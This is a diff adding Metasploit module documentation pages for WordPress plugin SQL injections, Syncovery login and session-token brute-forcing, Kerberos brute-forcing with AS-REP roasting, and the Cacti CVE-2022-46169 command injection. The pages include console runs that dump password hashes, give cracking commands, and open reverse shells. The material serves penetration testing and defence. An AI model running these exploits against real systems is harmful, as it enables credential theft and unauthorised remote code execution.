 [*]          Enrollment SIDs:
 [*]             * S-1-5-11 (Authenticated Users)
 [*] Auxiliary module execution completed
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > 
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) >
 ```
@@ -0,0 +1,220 @@
+## Vulnerable Application
+
+The BookingPress WordPress plugin before 1.0.11 fails to properly sanitize user supplied data
+in the `total_service` parameter of the `bookingpress_front_get_category_services` AJAX action
+(available to unauthenticated users), prior to using it in a dynamically constructed SQL query.
+As a result, unauthenticated attackers can conduct an SQL injection attack to dump sensitive
+data from the backend database such as usernames and password hashes.
+
+This module uses this vulnerability to dump the list of WordPress users and their associated
+email addresses and password hashes for cracking offline.
+
+### Setup
+#### Ubuntu 20.04 with Docksal
+Install Docksal:
+
+```bash
+sudo apt update
+sudo apt install curl
+bash <(curl -fsSL https://get.docksal.io)
+sudo usermod -aG docker $USER
+```
+
+Reboot the VM (Docksal needs to be able to run `docker` without sudo).
+
+```bash
+msfuser@ubuntu:~$ fin project create
+1. Name your project (lowercase alphanumeric, underscore, and hyphen): msf
+
+2. What would you like to install?
+   PHP based
+    1.  Drupal 9 (Composer Version)
+    2.  Drupal 9 (BLT Version)
+    3.  Drupal 9
+    4.  Drupal 7
+    5.  Wordpress
+    6.  Magento
+    7. Laravel
+    8. Symfony Skeleton
+    9. Symfony WebApp
+    10. Grav CMS
+    11. Backdrop CMS
+
+Go based
+12. Hugo
+
+JS based
+13. Gatsby JS
+14. Angular
+
+HTML
+15. Static HTML site
+
+Custom
+0. Custom git repository
+
+
+Enter your choice (0-15): 5
+
+Project folder:   /home/msfuser/msf
+Project software: Wordpress
+Source repo:      https://github.com/docksal/boilerplate-wordpress.git
+Source branch:    <default>
+Project URL:      http://msf.docksal
+
+Do you wish to proceed? [y/n]: y
+
+...
+
+Success: WordPress installed successfully.
+
+real	0m10.112s
+user	0m0.327s
+sys	0m0.061s
+Open http://msf-wp.docksal in your browser to verify the setup.
+Admin panel: http://msf-wp.docksal/wp-admin. User/password: admin/admin
+ DONE!  Completed all initialization steps.
+```
+
+Download a vulnerable version of BookingPress:
+`wget https://downloads.wordpress.org/plugin/bookingpress-appointment-booking.1.0.10.zip`
+
+Navigate to the WordPress admin page that was just setup by Docksal at
+http://msf-wp.docksal/wp-admin and log in with the username `admin` and password `admin`.
+
+Navigate to `Plugins` on the left hand menu, then select `Add New` then select `Upload Plugin`.
+
+Select `Browse...` and browse to the `bookingpress-appointment-booking.1.0.10.zip` file just downloaded, click `Install Now`.
+
+You should see the following output in the browser:
+
+```
+Installing Plugin from uploaded file: bookingpress-appointment-booking.1.0.10.zip
+
+Unpacking the package…
+
+Installing the plugin…
+
+Plugin installed successfully.
+```
+
+Click `Activate Plugin`.
+
+The BookingPress plugin has to be in use on the WordPress site in order to exploit the vulnerability.
+To activate it, follow the directions below:
+
+1. Navigate to `/wp-admin/admin.php?page=bookingpress_services`.
+1. Click `Manage Categories`, then click `+ Add New`, enter a `Category Name` and click `Save`.
+1. Beside `Manage Services` click `+ Add New`, enter a `Service Name`, enter the Category you just created in the `Category` dropdown, enter a `Price` and click `Save`.
+1. Select `+ New` at the top of the screen and then select `Page` from the dropdown to create a new WordPress page.
+1. Paste `[bookingpress_form]` on the new page and click `publish`.
+1. Navigate to `/bookingpress/` and you should see BookPress running with the Category / Service you created in step 1.
+
+### Installation Notes
+You may need to increase the size of file uploads to install the BookingPress plugin. To do this, you can use
+https://wordpress.org/plugins/tuxedo-big-file-uploads/ or https://wordpress.org/plugins/wp-maximum-upload-file-size/
+to increase the file upload size. I then had to some fiddling around since it may take some time for the changes
+to be picked up. You may have success if you also install https://wordpress.org/plugins/custom-php-settings/, so
+this is worth a shot if you are having issues.
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Do: `use auxiliary/gather/wp_bookingpress_category_services_sqli`.
+1. Set the options `RHOSTS` to the target WordPress host IP address.
+1. Set `RPORT` to the port that the target WordPress install is running on.
+1. Set `BOOKING_PRESS_PAGE` to the path on the WordPress host where the BookingPress make a booking page is.
+1. Verify visiting this URL shows "Select Category" and "Select Service" on the resulting page.
+1. Run the module.
+1. Receive a table of WordPress users and their associated email addresses and password hashes.
+
+## Scenarios
+### Booking Press 1.0.10, WordPress Running Via Docksal, Ubuntu 20.04
+```
+msf6 > use gather/wp_bookingpress_category_services_sqli
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set rhosts localhost
+rhosts => localhost
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set rport 8000
+rport => 8000
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Extracting credential information
+Wordpress User Credentials
+==========================
+
+ Username       Email                         Hash
+ --------       -----                         ----
+ admin          admin@admin.com               $P$BfxUckldN6AiHPD0BK6jg58se2b.aL.
+ hackerman      hackerman@hacktheworld.io     $P$BESfz7bqSOY8VkUfuYXAZ/bT5E36ww/
+ mr_metasploit  mr_metasploit@metaslpoit.org  $P$BDb8pIfym5dS6WTnNU8vU5Uk6i89fk.
+ msfuser        msfuser@rapid7.com            $P$BpITVDPiqOZ7fyQbI5g9rsgUvZQFBd1
+ todd           todd@toddtown.com             $P$BnlpkVgxGFWnmvdDQ3JStgpIx8LMFj0
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set AutoCheck false
+AutoCheck => false
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run
+
+[!] AutoCheck is disabled, proceeding with exploitation
+[*] Extracting credential information
+Wordpress User Credentials
+==========================
+
+ Username       Email                         Hash
+ --------       -----                         ----
+ admin          admin@admin.com               $P$BfxUckldN6AiHPD0BK6jg58se2b.aL.
+ hackerman      hackerman@hacktheworld.io     $P$BESfz7bqSOY8VkUfuYXAZ/bT5E36ww/
+ mr_metasploit  mr_metasploit@metaslpoit.org  $P$BDb8pIfym5dS6WTnNU8vU5Uk6i89fk.
+ msfuser        msfuser@rapid7.com            $P$BpITVDPiqOZ7fyQbI5g9rsgUvZQFBd1
+ todd           todd@toddtown.com             $P$BnlpkVgxGFWnmvdDQ3JStgpIx8LMFj0
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) >
+```
+
+### Booking Press 1.0.10, WordPress Latest Docker Image on Debian 11 (bullseye)
+```
+msf6 > use auxiliary/gather/wp_bookingpress_category_services_sqli
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RPORT 8000
+RPORT => 8000
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set TARGETURI "/?page_id=10"
+TARGETURI => /?page_id=10
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > show options
+
+Module options (auxiliary/gather/wp_bookingpress_category_services_sqli):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8000             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /?page_id=10     yes       The URL of the BookingPress appointment booking page
+   VHOST                       no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > check
+[+] 127.0.0.1:8000 - The target is vulnerable.
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > exploit
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Extracting credential information
+Wordpress User Credentials
+==========================
+
+ Username   Email                  Hash
+ --------   -----                  ----
+ normal     normal@test.com        $P$Bu9/XNK93oyUTKO.zJ9yGZfYAcbZg9.
+ testAdmin  test@testfakeness.com  $P$BYWtZOfh8yqLCKA877hwBysqGdRtk/.
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) >
+```
@@ -0,0 +1,81 @@
+## Vulnerable Application
+[Syncovery For Linux with Web-GUI](https://www.syncovery.com/download/linux/)
+
+This module attempts to brute-force valid login credentials for the Syncovery File Sync & Backup Software Web-GUI for Linux.
+The default credentials are checked by default.
+
+### Authors
+
+- Jan Rude (mgm security partners GmbH)
+
+### Platforms
+
+- Unix
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use modules/auxiliary/scanner/http/syncovery_linux_login`
+4. Do: `set RHOSTS <TARGET HOSTS>`
+5. Do: `run`
+6. On success you should get valid credentials.
+
+## Options
+
+### USERNAME
+Username used for login. Default is "default".
+
+### PASSWORD
+Password used for login. Default is "pass".
+
+### TARGETURI
+The path to Syncovery login.
+
+### PORT
+The (TCP) target port on which Syncovery is running. By default port 8999 is used for HTTP and port 8943 is used for HTTPS.
+
+## Scenarios
+
+### Syncovery for Linux with default credentials
+
+```
+msf6 > use modules/auxiliary/scanner/http/syncovery_linux_login
+msf6 auxiliary(scanner/http/syncovery_linux_login) > set rhosts 192.168.178.26
+rhosts => 192.168.178.26
+msf6 auxiliary(scanner/http/syncovery_linux_login) > options
+
+Module options (auxiliary/scanner/http/syncovery_linux_login):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   BLANK_PASSWORDS   false            no        Try blank passwords for all users
+   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
+   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
+   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
+   DB_ALL_USERS      false            no        Add all users in the current database to the list
+   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
+   PASSWORD          pass             no        The password to Syncovery (default: pass)
+   PASS_FILE                          no        File containing passwords, one per line
+   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS            192.168.178.26   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT             8999             yes       The target port (TCP)
+   SSL               false            no        Negotiate SSL/TLS for outgoing connections
+   STOP_ON_SUCCESS   true             yes       Stop guessing when a credential works for a host
+   TARGETURI         /                no        The path to Syncovery
+   THREADS           1                yes       The number of concurrent threads (max one per host)
+   USERNAME          default          yes       The username to Syncovery (default: default)
+   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
+   USER_AS_PASS      false            no        Try the username as the password for all users
+   USER_FILE                          no        File containing usernames, one per line
+   VERBOSE           true             yes       Whether to print output for all attempts
+   VHOST                              no        HTTP server virtual host
+
+msf6 auxiliary(scanner/http/syncovery_linux_login) > run
+
+[+] 192.168.178.26:8999 - Syncovery File Sync & Backup Software confirmed
+[+] 192.168.178.26:8999 - Identified version: 9.48a
+[+] 192.168.178.26:8999 - Success: 'default:pass'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,77 @@
+## Vulnerable Application
+[Syncovery For Linux with Web-GUI](https://www.syncovery.com/download/linux/)
+
+This module attempts to brute-force a valid session token for the Syncovery File Sync & Backup Software Web-GUI
+by generating all possible tokens, for every second between 'DateTime.now' and the given X day(s).
+By default today and yesterday (DAYS = 1) will be checked. If a valid session token is found, the module stops.
+The vulnerability exists, because in Syncovery session tokens are basically just `base64(m/d/Y H:M:S)` at the time
+of the login instead of a random token.
+If a user does not logout, the token stays valid until next reboot. Note that the mobile version of the WEB GUI
+as well as the obsolete branch 8 of Syncovery do not have a logout button.
+
+This affects Syncovery for Linux before v9.48j and all versions of the obsolete branch 8.
+
+### Setup
+
+Installing a vulnerable version of Syncovery for Linux to test this vulnerability is quite easy.
+Download a vulnerable version of Syncovery for Linux: https://www.syncovery.com/release/Syncovery-9.47a-amd64.deb
+Install it and once the server is up, you can access it on port 8999 for testing...
+
+## Authors
+
+- Jan Rude (mgm security partners GmbH)
+
+## Platforms
+
+- Unix
+
+## Verification Steps
+
+1. `use auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536`
+2. `set RHOSTS <TARGET HOSTS>`
+3. `run`
+5. On success you should get a valid token.
+
+## Options
+
+### TARGETURI
+The path to Syncovery login mask.
+
+### PORT
+The (TCP) target port on which Syncovery is running. By default port 8999 is used for HTTP and port 8943 is used for HTTPS.
+
+## Scenarios
+
+### Syncovery for Linux with default credentials
+
+```
+msf6 > use auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536
+msf6 auxiliary(scanner/http/syncovery_linux_token_cve_2022_36536) > set rhosts 192.168.178.26
+rhosts => 192.168.178.26
+msf6 auxiliary(scanner/http/syncovery_linux_token_cve_2022_36536) > options
+
+Module options (auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   DAYS       1                yes       Check today and last X day(s) for valid session token
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.178.26   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8999             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                no        The path to Syncovery
+   THREADS    1                yes       The number of concurrent threads (max one per host)
+   VHOST                       no        HTTP server virtual host
+
+msf6 auxiliary(scanner/http/syncovery_linux_token_cve_2022_36536) > check
+[+] 192.168.178.26:8999 - The target is vulnerable.
+msf6 auxiliary(scanner/http/syncovery_linux_token_cve_2022_36536) > run
+
+[*] 192.168.178.26:8999 - Starting Brute-Forcer
+[+] 192.168.178.26:8999 - Valid token found: 'MDkvMDYvMjAyMiAxMzo0NDoxMg=='
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+## Limitations
+In Syncovery v9.x tokens get invalidated after the user logs out. In this case no valid token can be found.
@@ -0,0 +1,68 @@
+## Vulnerable Application
+
+Paid Membership Pro, a WordPress plugin,
+prior to 2.9.8 is affected by an unauthenticated SQL injection via the
+`code` parameter.
+
+The plugin can be downloaded from https://wordpress.org/plugins/paid-memberships-pro/, like
+(2.9.7)[https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip]
+
+## Verification Steps
+
+1. Install the plugin
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/wp_paid_membership_pro_code_sqli`
+4. Do: `set rhosts [ip]`
+5. Do: `run`
+6. You should get the users and hashes returned.
+
+## Options
+
+### ACTION: List Users
+
+This action lists `COUNT` users and password hashes.
+
+### COUNT
+
+If action `List Users` is selected (default), this is the number of users to enumerate.
+The larger this list, the more time it will take.  Defaults to `1`.
+
+## Scenarios
+
+### Paid Membership Pro 2.9.7 on Wordpress 5.7.5 on Ubuntu 20.04
+
+```
+msf6 > use auxiliary/scanner/http/wp_paid_membership_pro_code_sqli
+[*] Using auxiliary/scanner/http/wp_paid_membership_pro_code_sqli
+msf6 auxiliary(scanner/http/wp_paid_membership_pro_code_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/wp_paid_membership_pro_code_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/wp_paid_membership_pro_code_sqli) > check
+
+[*] Checking /wp-content/plugins/paid-memberships-pro/readme.txt
+[*] Found version 2.9.7 in the plugin
+[*] 1.1.1.1:80 - The target appears to be vulnerable.
+msf6 auxiliary(scanner/http/wp_paid_membership_pro_code_sqli) > exploit
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/paid-memberships-pro/readme.txt
+[*] Found version 2.9.7 in the plugin
+[+] The target appears to be vulnerable.
+[*] Enumerating Usernames and Password Hashes
+[!] Each user will take about 5-10 minutes to enumerate. Be patient.
+[*] {SQLi} Executing (select group_concat(NAbWtHUpd) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) NAbWtHUpd from wp_users limit 3) Ip)
+[*] {SQLi} Time-based injection: expecting output of length 124
+[+] Dumped table contents:
+wp_users
+========
+
+ user_login  user_pass
+ ----------  ---------
+ admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
+ admin2      $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
+ editor      $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,172 @@
+## Kerberos Login/Bruteforce
+
+The `auxiliary/scanner/kerberos/kerberos_login` module can verify Kerberos credentials against a range of machines and
+report successful logins. If you have loaded a database plugin
+and connected to a database this module will record successful
+logins and hosts so you can track your access.
+
+Kerberos accounts which do not require pre-authentication will
+have the TGT logged for offline cracking, this technique is known as AS-REP Roasting.
+
+This module is able to identify the following information from the KDC: 
+
+- Valid/Invalid accounts
+- Locked/Disabled accounts
+- Accounts with expired passwords, when the password matches
+- AS-REP Roastable accounts
+
+## Target
+
+To use the `kerberos_login` module, make sure you are able to connect to the
+Kerberos service on a Domain Controller.
+
+## Scenarios
+
+### Creating a single Kerberos ticket (TGT)
+
+To create a single Kerberos ticket (TGT), set the username and password options:
+
+```
+msf6 auxiliary(scanner/kerberos/kerberos_login) > run rhost=192.168.123.133 domain=DEMO.local username=basic_user password=password verbose=true
+[*] Using domain: DEMO.LOCAL - 192.168.123.133:88   ...
+[+] 192.168.123.133 - User found: "basic_user" with password password
+[*] Auxiliary module execution completed
+```
+
+### Auth Brute
+
+The following demonstrates basic usage, using a custom wordlist,
+targeting a single Domain Controller to identify valid domain user
+accounts and additionally bruteforcing passwords:
+
+Create a new `./users.txt` file and `./wordlist.txt`, then run the module:
+
+```
+msf6 auxiliary(gather/kerberos_enumusers) > run rhost=192.168.123.133 domain=DEMO.local user_file=./users.txt pass_file=./wordlist.txt verbose=true
+[*] Reloading module...
+
+[*] Using domain: DEMO.LOCAL - 192.168.123.133:88   ...
+[+] 192.168.123.133 - User: "basic_user" is present
+[*] 192.168.123.133 - User: "basic_user" wrong password invalid2
+[*] 192.168.123.133 - User: "basic_user" wrong password p4$$w0rd
+[*] 192.168.123.133 - User: "basic_user" wrong password test_password
+[+] 192.168.123.133 - User found: "basic_user" with password password. Hash: $krb5asrep$23$basic_user@DEMO.LOCAL:959b983f9cffc093002d9cd8a20...etc...
+[*] 192.168.123.133 - User: "foo" user not found
+[*] 192.168.123.133 - User: "foo_bar" user not found
+[+] 192.168.123.133 - User: "Administrator" is present
+[*] 192.168.123.133 - User: "Administrator" wrong password invalid2
+[*] 192.168.123.133 - User: "Administrator" wrong password p4$$w0rd
+[*] 192.168.123.133 - User: "Administrator" wrong password test_password
+[*] 192.168.123.133 - User: "Administrator" wrong password password
+[+] 192.168.123.133 - User: "no_pre_auth" does not require preauthentication. Hash: $krb5asrep$23$no_pre_auth@DEMO.LOCAL:a714f0553589cbd78...etc...
+[+] 192.168.123.133 - User: "admin" is present
+[*] 192.168.123.133 - User: "admin" wrong password invalid2
+[*] 192.168.123.133 - User: "admin" - Kerberos Error - KDC_ERR_KEY_EXPIRED (23) - Password has expired - change password to reset
+[*] 192.168.123.133 - User: "admin" wrong password test_password
+[*] 192.168.123.133 - User: "admin" wrong password password
+[*] Auxiliary module execution completed
+```
+
+### ASREPRoasting
+
+Accounts that have `Do not require Kerberos preauthentication` enabled, will receive an ASREP response with a ticket-granting-ticket present.
+The technique of cracking this ticket offline is called ASREPRoasting.
+
+Cracking ASREP response with John:
+
+```
+john ./hashes.txt --wordlist=./wordlist.txt --format:krb5asrep
+```
+
+Cracking ASREP response with Hashcat:
+
+```
+hashcat -m 18200 -a 0 ./hashes.txt ./wordlist.txt
+```
+
+You can see previously cracked creds with:
+
+```
+creds -v
+```
+
+## Options
+
+The `kerberos_login` module only requires the `RHOST`, `DOMAIN` and
+`USER_FILE` options to run.
+
+**The DOMAIN option**
+
+This option is used to specify the target domain. If the domain name is
+incorrect an error is returned and domain user account enumeration will fail.
+
+An example of setting DOMAIN:
+
+```
+set DOMAIN [domain name]
+```
+
+**The USER_FILE option**
+
+This option is used to specify the file containing a list of user names
+to query the Domain Controller to identify if they exist in the target domain
+or not. One per line.
+
+An example of setting USER_FILE:
+
+```
+set USER_FILE [path to file]
+```
+
+**The PASS_FILE option**
+
+If you happen to manage all the found passwords in a separate file, then this option would be
+suitable for that. One per line.
+
+```
+set PASS_FILE [path to file]
+```
+
+**The USERPASS_FILE option**
+
+If each user should be using a specific password in your file, then you can use this option. One
+username/password per line:
+
+```
+set USERPASS_FILE [path to file]
+```
+
+**The DB_ALL_CREDS option**
+
+This option allows you to reuse all the user names and passwords collected by the database:
+
+```
+set DB_ALL_CREDS true
+```
+
+**The DB_ALL_PASS option**
+
+This option allows you to reuse all the passwords collected by the database.
+
+```
+set DB_ALL_PASS true
+```
+
+**The DB_ALL_USERS option**
+
+This option allows you to reuse all the user names collected by the database.
+
+```
+set DB_ALL_USERS true
+```
+
+**The Timeout option**
+
+This option is used to specify the TCP timeout i.e. the time to wait
+before a connection to the Domain Controller is established and data read.
+
+An example of setting Timeout:
+
+```
+set Timeout [value in seconds]
+```
@@ -0,0 +1,304 @@
+## Vulnerable Application
+This module exploits an unauthenticated command injection vulnerability in Cacti through 1.2.22 (CVE-2022-46169)
+in order to achieve unauthenticated remote code execution as the www-data user.
+
+The module first attempts to obtain the Cacti version to see if the target is affected.
+If `LOCAL_DATA_ID` and/or `HOST_ID` are not set, the module will try to bruteforce the missing value(s).
+For the bruteforce, the total number of possible requests is limited to 1,000.
+However, it is possible to set the range for the `local_data_id` and `host_id` values to try
+via the advanced options `MIN_HOST_ID` (default 1), `MAX_HOST_ID` (default 5), `MIN_LOCAL_DATA_ID` (default 1)
+and `MAX_LOCAL_DATA_ID` (default 100).
+If a valid combination is found, the module will use these to attempt exploitation.
+If `LOCAL_DATA_ID` and/or `HOST_ID` are both set, the module will immediately attempt exploitation.
+
+The bruteforce attempt can have three possible outcomes:
+- Failure: No vulnerable `host_id` and `local_data_id` are found.
+- Success: A `host_id` and `local_data_id` combination is found that is positively identified as vulnerable.
+The module determines this by comparing the `rrd_name` returned by the server to a list of data sources known to be vulnerable.
+- Indeterminate: The module identified several `host_id` and `local_data_id` combinations for which the server returns
+an empty `rrd_name` value. Many data sources in Cacti do not have an `rrd_name` value, some of which are vulnerable.
+In this case, the only way to verify if a local_data_id value corresponds to an exploitable data source, is to actually try and exploit it.
+Instead of trying to exploit all potentially vulnerable `host_id` and `local_data_id` combinations without an `rrd_name`,
+the module stores these.
+When the bruteforce attempt finishes with an indeterminate outcome, the list of potentially vulnerable `host_id`
+and `local_data_id` combinations is printed to the console.
+The user can then manually verify if any of these combinations are actually exploitable by using them
+to set the `HOST_ID` and `LOCAL_DATA_ID` options.
+
+During exploitation, the module sends a GET request to `/remote_agent.php` with the action parameter set to `polldata`
+and the `X-Forwarded-For` header set to the provided value for `X_FORWARDED_FOR_IP` (by default `127.0.0.1`).
+In addition, the `poller_id` parameter is set to the payload and the `host_id` and `local_data_id` parameters
+are set to the bruteforced or provided values.
+If `X_FORWARDED_FOR_IP` is set to an address that is resolvable to a hostname in the poller table,
+and the `local_data_id` and `host_id` values are vulnerable, the payload set for `poller_id` will be executed by the target.
+
+This module has been successfully tested against Cacti version 1.2.22 running on Ubuntu 21.10 (vulhub docker image)
+
+## Installation Information
+Cacti is open source, and vulnerable versions can be obtained from the official GitHub repository under
+[releases](https://github.com/Cacti/cacti/releases).
+As a shortcut, a vulhub entry is available [here](https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169)
+that allows you to spin up a vulnerable instance via a single docker-compose command.
+The vulhub page also contains instructions for how to complete the Cacti installation, how to make it vulnerable, and a PoC.
+
+Additional details about the exploit are available [here](https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf)
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use exploit/linux/http/cacti_unauthenticated_cmd_injection`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+4. Do: `set SRVHOST [IP]`
+5. Do: `exploit`
+
+## Options
+### TARGETURI
+The base path to Cacti. The default value is `/`.
+### HOST_ID
+The `host_id` value to use. By default, the module will try to bruteforce this.
+### LOCAL_DATA_ID
+The `local_data_id` value to use. By default, the module will try to bruteforce this.
+### X_FORWARDED_FOR_IP
+The IP to use in the `X-Forwarded-For` HTTP header. This should be resolvable to a hostname in the poller table. Default: 127.0.0.1
+
+## Advanced Options
+### MIN_HOST_ID
+Lower value for the range of possible `host_id` values to check for. Default: 1
+### MAX_HOST_ID
+Upper value for the range of possible `host_id` values to check for. Default: 5
+### MIN_LOCAL_DATA_ID
+Lower value for the range of possible local_data_id values to check for. Default: 1
+### MAX_LOCAL_DATA_ID
+Upper value for the range of possible local_data_id values to check for. Default: 100
+
+## Targets
+```
+Id  Name
+--  ----
+0   Automatic (Unix In-Memory)
+1   Automatic (Linux Dropper)
+```
+
+## Scenarios
+### Cacti 1.2.22 - Linux Dropper - HOST_ID and LOCAL_DATA_ID not set (bruteforce)
+```
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > options 
+
+Module options (exploit/linux/http/cacti_unauthenticated_cmd_injection):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   HOST_ID                              no        The host_id value to use. By default, the module will try to bruteforce this.
+   LOCAL_DATA_ID                        no        The local_data_id value to use. By default, the module will try to bruteforce this.
+   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS              192.168.91.195   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT               8080             yes       The target port (TCP)
+   SRVHOST             192.168.91.195   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all add
+                                                  resses.
+   SRVPORT             9090             yes       The local port to listen on.
+   SSL                 false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                              no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI           /                yes       The base path to Cacti
+   URIPATH                              no        The URI to use for this exploit (default is random)
+   VHOST                                no        HTTP server virtual host
+   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.91.195   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Automatic (Linux Dropper)
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > run
+
+[*] Started reverse TCP handler on 192.168.91.195:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is Cacti version 1.2.22
+[*] Trying to bruteforce an exploitable host_id and local_data_id by trying up to 505 combinations
+[*] Enumerating local_data_id values for host_id 1
+[*] Performing request 25...
+[*] Performing request 50...
+[*] Performing request 75...
+[+] Found exploitable local_data_id 180 for host_id 1
+[*] Sending stage (1017704 bytes) to 10.18.0.3
+[*] Command Stager progress - 100.00% done (773/773 bytes)
+[*] Meterpreter session 1 opened (192.168.91.195:4444 -> 10.18.0.3:45322) at 2022-12-22 16:43:59 +0200
+
+meterpreter > getuid
+Server username: www-data
+```
+
+### Cacti 1.2.22 - Unix In-Memory - HOST_ID and LOCAL_DATA_ID set (immediate exploitation)
+```
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > options 
+
+Module options (exploit/linux/http/cacti_unauthenticated_cmd_injection):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   HOST_ID             1                no        The host_id value to use. By default, the module will try to bruteforce this.
+   LOCAL_DATA_ID       182              no        The local_data_id value to use. By default, the module will try to bruteforce this.
+   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS              192.168.91.195   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT               8080             yes       The target port (TCP)
+   SRVHOST             192.168.91.195   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all add
+                                                  resses.
+   SRVPORT             9090             yes       The local port to listen on.
+   SSL                 false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                              no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI           /                yes       The base path to Cacti
+   URIPATH                              no        The URI to use for this exploit (default is random)
+   VHOST                                no        HTTP server virtual host
+   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.91.195   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (Unix In-Memory)
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > run
+
+[*] Started reverse TCP handler on 192.168.91.195:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is Cacti version 1.2.22
+[*] Executing the payload. This may take a few seconds...
+[*] Command shell session 1 opened (192.168.91.195:4444 -> 10.18.0.3:50802) at 2022-12-22 16:51:46 +0200
+
